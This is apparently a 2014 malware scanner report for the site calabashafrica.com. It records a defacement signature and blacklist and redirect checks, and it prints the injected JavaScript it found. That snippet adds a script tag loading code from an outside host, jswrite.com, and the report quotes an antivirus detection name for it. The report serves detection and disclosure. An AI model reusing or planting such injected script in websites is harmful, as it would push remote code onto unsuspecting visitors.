New scan:

Malware Scanner report for calabashafrica.com

Malicious/Suspicious/Total urls checked
1/0/4
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

--==Hacked By Ali Attacker==--  (41 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://calabashafrica.com/
200 OK
Content-Length: 4043
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

if(top == self){
var zhead = document.getElementsByTagName('head')[0];
if(!zhead){zhead = document.createElement('head');}
var qscript = document.createElement('script');
qscript.setAttribute('id','wsh2_js');
qscript.setAttribute('src','http://jswrite.com/script1.js');
qscript.setAttribute('type','text/javascript');qscript.async = true;
if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript);
}

Antivirus reports:

NANO-Antivirus
Riskware.Script.BetterSurf.ctbzhb

Deface/Content modification. The following signature was found: --==Hacked By Ali Attacker==--

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">







<embed src="" type="application/x-shockwave-flash" <="" embed="" height="0" width="0">
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
<title>--==Hacked By Ali Attacker==--</title>
<link rel="shortcut icon" href="http://www.balyan.ir/wp-content/uploads/iran1.png" type="image/x-icon">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script>if(typeof window.__wsujs==='undefined'){window.__wsujs=2299;window.__wsujsn='PlugIn';window.__wsujss='1A6D7E589581EC988307653B11A6E0C9';} </script>
<script>if(top == self){
...[3781 bytes skipped]...


http://calabashafrica.com/test404page.js
404 Not Found
Content-Length: 11812
Content-Type: text/html
clean
http://code.jquery.com/jquery-1.9.1.js
200 OK
Content-Length: 268381
Content-Type: application/x-javascript
clean
http://calabashafrica.com/cgi-sys/js/simple-expand.min.js
200 OK
Content-Length: 2782
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: calabashafrica.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Nov 2014 01:35:02 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 4043
Content-Type: text/html
Last-Modified: Fri, 15 Aug 2014 17:14:49 GMT

...4043 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: calabashafrica.com
Referer: http://www.google.com/search?q=calabashafrica.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=calabashafrica.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://calabashafrica.com/

Result: calabashafrica.com is not infected or malware details are not published yet.